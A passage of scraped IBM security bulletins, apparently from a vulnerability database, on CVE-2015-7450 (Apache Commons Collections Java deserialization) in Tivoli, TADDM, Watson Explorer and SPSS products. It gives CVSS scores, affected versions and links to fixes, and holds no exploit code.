<http://www.ibm.com/support/docview.wss?uid=swg24041370> \n6.3| 6.3.2.5| Linux \nWindows| [http://www.ibm.com/support/docview.wss?uid=swg24037601](<http://www-01.ibm.com/support/docview.wss?uid=swg24037601>) \n \n**_Tivoli Storage \nFlashCopy Manager for VMware Release_**| **_ \nFirst Fixing VRMF Level_**| **_ \nClient_** \n**_Platform_**| **_ \n \nLink to Fix / Fix Availability Target_** \n---|---|---|--- \n4.1| 4.1.4| Linux| <http://www.ibm.com/support/docview.wss?uid=swg24041139> \n3.2| 3.2.0.6| Linux| Note that 3.2.0.5 is no longer available for download. You can download 3.2.0.9 to obtain the fix:<ftp://public.dhe.ibm.com/storage/tivoli-storage-flashcopymanager/patches/v3r2/vmware/> \n3.1| 3.1.1.3| Linux| Fixes for release 3.1 are no longer available for download as this release is no longer supported. Customers requiring fixes should upgrade to the latest release which contains the most recent security fixes. Contact IBM Support with any questions. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:55", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Storage Manager for Virtual Environments: Data Protection for VMware and IBM Tivoli Storage FlashCopy Manager for VMware (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:55", "id": "7A9325A3A31DA6075D430BD9972B87037EACC19F9E8A6BECE8F05FDEEF567CEB", "href": "https://www.ibm.com/support/pages/node/273791", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:57", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Composite Application Manager Agent for J2EE.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Tivoli Composite Application Manager Agent for J2EE: 7.1.1\n\n## Workarounds and Mitigations\n\nThe affected Apache commons-collections-3.2.jar is in the IBM Tivoli Composite Application Manager Agent for J2EE image. The instruction of replacing commons-collections-3.2.jar with commons-collections-3.2.2.jar can be found at <http://www.ibm.com/support/docview.wss?uid=swg21972199>\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:51", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Composite Application Manager Agent for J2EE (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:51", "id": "0629AF41906DD26A46F9FEDBC0E3DEA130B830A45C43613EEC32A92E38CD9329", "href": "https://www.ibm.com/support/pages/node/273589", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:58", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Storage Manager Operations Center (IBM Spectrum Protect Operations Center) and IBM Tivoli Storage Manager Client Services (IBM Spectrum Protect Client Management Services).. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Tivoli Storage Manager Operations Center (Spectrum Protect Operations Center) V6.4 and V7.1 \n\nIBM Tivoli Storage Manager Client Management Services (Spectrum Protect Client Management Services) V7.1\n\n## Remediation/Fixes\n\n**Release**\n\n| **First Fixing VRMF Level**| **Remediation/First Fix** \n---|---|--- \nOC 6.4 *| OC 6.4.2.300| [ALL Operating Systems](<ftp://ftp.software.ibm.com/storage/tivoli-storage-management/patches/opcenter/6.4.2.300/>) \nOC 7.1| OC 7.1.4.000| [ALL Operating Systems](<ftp://ftp.software.ibm.com/storage/tivoli-storage-management/maintenance/opcenter/v7r1/>) \nCMS 7.1| CMS 7.1.4.000| [ALL Operating Systems](<ftp://ftp.software.ibm.com/storage/tivoli-storage-management/maintenance/cms/v7r1/>) \n \n* If the Operations Center is running on AIX, you must uninstall the Operations Center before you install the iFix. Instructions for uninstalling the Operations Center are available here: [](<http://www.ibm.com/support/knowledgecenter/SSGSG7_6.4.1/com.ibm.itsm.srv.install.doc/t_oc_inst_uninstalling.html?lang=en>) \n<http://www.ibm.com/support/knowledgecenter/SSGSG7_6.4.1/com.ibm.itsm.srv.install.doc/t_oc_inst_uninstalling.html?lang=en>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:28", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Storage Manager Operations Center (OC) and Client Management Services (CMS) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:28", "id": "5518E42719E2CDA44942EEB207D99CA80651C3C9A128414CB23DFF383B97AF66", "href": "https://www.ibm.com/support/pages/node/272619", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:00", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by TADDM.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nTADDM 7.3.0 - 7.3.0.2 \nTADDM 7.2.2 - 7.2.2.4 \nTADDM 7.2.1 - 7.2.1.6 \nTADDM 7.2.0 - 7.2.0.10\n\n## Remediation/Fixes\n\nThere are eFixes prepared on top of released GA and FixPacks for each stream: \n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**APAR**\n\n| **How to acquire fix** \n---|---|---|--- \n \nTADDM\n\n| \n\n7.3.0.1 - 7.3.0.2\n\n| \n\nNone\n\n| [Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/tivoli/efix_apache-commons-collections-3.2.2-wlp.zip>) \n \nTADDM\n\n| \n\n7.3.0 \n7.2.2 - 7.2.2.4 \n7.2.1 - 7.2.1.6 \n7.2.0 - 7.2.0.10\n\n| \n\nNone\n\n| [Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/tivoli/efix_apache-commons-collections-3.2.2.zip>) \nNote that the eFixes require manual deletion of vulnerable version of the Apache Commons Collections library. \nPlease get familiar with eFixes readme in etc/<efix_name>_readme.txt. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nThe only solution is to apply the eFixes. They are prepared on top of GA and FixPack releases. \nIf you need eFix for other TADDM version, please contact IBM Support. Open a PMR for a custom version of this eFix. Include your current eFix level, TADDM version and a link to this bulletin.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:18", "id": "75FBC99F16C88B1504B48FA2439543EF4EB7781607D6FBD77B50EA9DDDB94345", "href": "https://www.ibm.com/support/pages/node/272181", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:01", "description": "## Summary\n\nIBM has published information about a security vulnerability in IBM WebSphere Application Server shipped with Tivoli Integrated Portal in Tivoli Network Manager IP Edition.\n\n## Vulnerability Details\n\nPlease consult the security bulletin Vulnerability in Apache Commons affects[ IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for a vulnerability details and information about fix.\n\n## Affected Products and Versions\n\n**_Affected Product and Version(s)_**\n\n| **_Product and Version shipped as a component_** \n---|--- \nTivoli Network Manager IP Edition 3.8| Bundled the TIP version 1.1.1.x which include IBM WebSphere version 6.1.0.x. \nTivoli Network Manager IP Edition 3.9| Bundled the TIP version 2.1.0.x which include IBM WebSphere version 7.0.0.x.. \nTivoli Network Manager IP Edition 4.1| Bundled the TIP version 2.2.0.x which include IBM WebSphere version 7.0.0.x. \nTivoli Network Manager IP Edition 4.1.1| Bundled the TIP version 2.2.0.x. which include IBM WebSphere version 7.0.0.x. \n \nNote: If TIP has been upgraded, please follow TIP security bulletin to upgrade an appropriate IBM WebSphere version. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:11", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Tivoli Network Manager IP Edition (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:11", "id": "824E537DD314DA72866A8405781D328166B8D8F77550C925EC957FB68C2CB1CA", "href": "https://www.ibm.com/support/pages/node/272031", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:35", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Watson Explorer and Watson Content Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n\n\n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n * Watson Explorer Annotation Administration Console version 11.0 and version 10.0 through 10.0.0.2\n * Watson Explorer Analytical Components version 11.0 and version 10.0 through 10.0.0.2\n * Watson Content Analytics version 3.5 through 3.5.0.3 and version 3.0 through 3.0.0.6\n\n## Remediation/Fixes\n\nDownload the readme file and the ZIP file or TAR file for your enviroment, and then follow the instructions in the readme file to install the fix. \n\nThe table reflects product names at the time the specified versions were released. To use the links to Fix Central in this table, you must first log in to the IBM Support: Fix Central site at <http://www.ibm.com/support/fixcentral/>.\n\n**Affected Product**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Foundational Components Annotation Administration Console| 11.0| \n\n 1. Download the readme file for your edition (EE for Enterprise or AE for Advanced) from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>), for example: **11.0.0.0-WS-WatsonExplorer-EEFoundationalAAC-Readme-IF001**\n 2. Download the interim fix for your edition and operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>): interim fix **11.0.0.0-WS-WatsonExplorer-EEFoundationalAAC-<OS>-IF001** (for example, 11.0.0.0-WS-WatsonExplorer-EEFoundationalAAC-Linux-IF001).\n 3. Follow the instructions in the readme file to apply the fix. \nIBM Watson Explorer Foundational Components Annotation Administration Console| 10.0 through 10.0.0.2| \n\n 1. If not already installed, install V10.0 Fix Pack 2 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24039429>)).\n 2. Download the readme file for your edition (EE for Enterprise or AE for Advanced) from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>), for example: **10.0.0.2-WS-WatsonExplorer-EEFoundationalAAC-Readme-IF001**\n 3. Download the interim fix for your edition and operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>): interim fix **10.0.0.2-WS-WatsonExplorer-EEFoundationalAAC-<OS>-IF001** (for example, 10.0.0.2-WS-WatsonExplorer-EEFoundationalAAC-Windows-IF001).\n 4. Follow the instructions in the readme file to apply the fix. \nIBM Watson Explorer Analytical Components| 11.0| \n\n 1. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>): **11.0.0.0-WS-WatsonExplorer-AEAnalytical-Readme-IF001**\n 2. Download the interim fix for IBM Watson Explorer Advanced Edition and your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.0.0&platform=All&function=all#Watson%20Explorer>): interim fix **11.0.0.0-WS-WatsonExplorer-AEAnalytical-<OS>-IF001** (for example, 11.0.0.0-WS-WatsonExplorer-AEAnalytical-Linux-IF001).\n 3. Follow the instructions in the readme file to apply the fix. \nIBM Watson Explorer Analytical Components| 10.0 through 10.0.0.2| \n\n 1. If not already installed, install V10.0 Fix Pack 2 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24039430>)).\n 2. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>): **10.0.0.2-WS-WatsonExplorer-AEAnalytical-Readme-IF001**\n 3. Download the interim fix for IBM Watson Explorer Advanced Edition and your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=10.0.0.2&platform=All&function=all#Watson%20Explorer>): interim fix **10.0.0.2-WS-WatsonExplorer-AEAnalytical-<OS>-IF001** (for example, 10.0.0.2-WS-WatsonExplorer-AEAnalytical-Linux-IF001).\n 4. Follow the instructions in the readme file to apply the fix. \nIBM Watson Content Analytics| 3.5 through 3.5.0.3| \n\n 1. If not already installed, install V3.5 Fix Pack 3 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24040936>)).\n 2. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.5.0.3&platform=All&function=all#Others>): **3.5.0.3-WT-WCA-Readme-IF001**\n 3. Download the interim fix for your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.5.0.3&platform=All&function=all#Others>): interim fix **3.5.0.3-WT-WCA-<OS>-IF001** (for example, 3.5.0.3-WT-WCA-AIX-IF001).\n 4. Follow the instructions in the readme file to apply the fix. \nIBM Content Analytics with Enterprise Search| 3.0 through 3.0.0.6| \n\n 1. If not already installed, install V3.0 Fix Pack 6 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24040579>)).\n 2. Download the readme file from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.0.0.6&platform=All&function=all#Others>): **3.0.0.6-WT-ICA-Readme-IF001**\n 3. Download the interim fix for your operating system from [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/IBM+Cognos+Content+Analytics&release=3.0.0.6&platform=All&function=all#Others>): interim fix **3.0.0.6-WT-ICA-<OS>-IF001** (for example, 3.0.0.6-WT-ICA-Linux-IF001).\n 4. Follow the instructions in the readme file to apply the fix. \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T13:06:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Watson Explorer and Watson Content Analytics (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T13:06:25", "id": "907D422E64306B77CE4FC8F237994BB7A9BE500E8F53773E33B3C6A72CB4F50D", "href": "https://www.ibm.com/support/pages/node/272913", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:06", "description": "## Summary\n\nAn Apache Commons Collections vulnerability in handling Java object deserialization was addressed by IBM SPSS Collaboration and Deployment Services. This vulnerability affects all versions of IBM SPSS Collaboration and Deployment Services. \n \nAn updated IBM WebSphere Liberty runtime is shipped to address a security vulnerability in IBM SPSS Collaboration and Deployment Services 7.0. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SPSS Collaboration and Deployment Services 7.0 \n\nIBM SPSS Collaboration and Deployment Services 6.0\n\nIBM SPSS Collaboration and Deployment Services 5.0\n\n## Remediation/Fixes\n\n[](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RepositoryServer-IF002>)\n\n_Product_| _VRMF_| _Remediation/Fix Central Link (install instructions in zip)_ \n---|---|--- \nRepository Server| _5.0_| [5.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=5.0.0.3-SCaDS-RepositoryServer-IF002>) \nRepository Server| _6.0_| [6.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=6.0.0.2-SCaDS-RepositoryServer-IF002>) \nRemote Scoring Server| 6.0| [6.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=6.0.0.2-SCaDS-RemoteScoringServer-IF002>) \nRemote Process Server| 6.0| [6.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=6.0.0.2-SCaDS-RemoteProcessServer-IF002>) \nRepository Server| 7.0| [7.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RepositoryServer-IF002>) \nRemote Scoring Server - Easy Install Option (Liberty)| 7.0| [7.0](<parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RemoteScoringServer-Easy-Deploy-IF002>) \nRemote Scoring Server - Manual Install Option| 7.0| [7.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RemoteScoringServer-Manual-Deploy-IF002>) \nRemote Process Server| _7.0_| [7.0](<https://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&function=fixId&fixids=7.0.0.1-SCaDS-RemoteProcessServer-IF002>) \n \n## Workarounds and Mitigations\n\nNA\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:21", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in bundled components affects IBM SPSS Collaboration and Deployment Services (CVE-2015-7450).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:21", "id": "842AA4D3168931006C05FFF54B0EA436F2CF6E10D76F87FCD72C3D78D4D077DF", "href": "https://www.ibm.com/support/pages/node/272711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:06", "description": "## Summary\n\nAn Apache Commons Collections vulnerability in handling Java object deserialization was addressed by IBM SPSS Analytic Server. \n \nAn updated IBM WebSphere Liberty run time is shipped to address a security vulnerability in IBM SPSS Analytic Server. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See 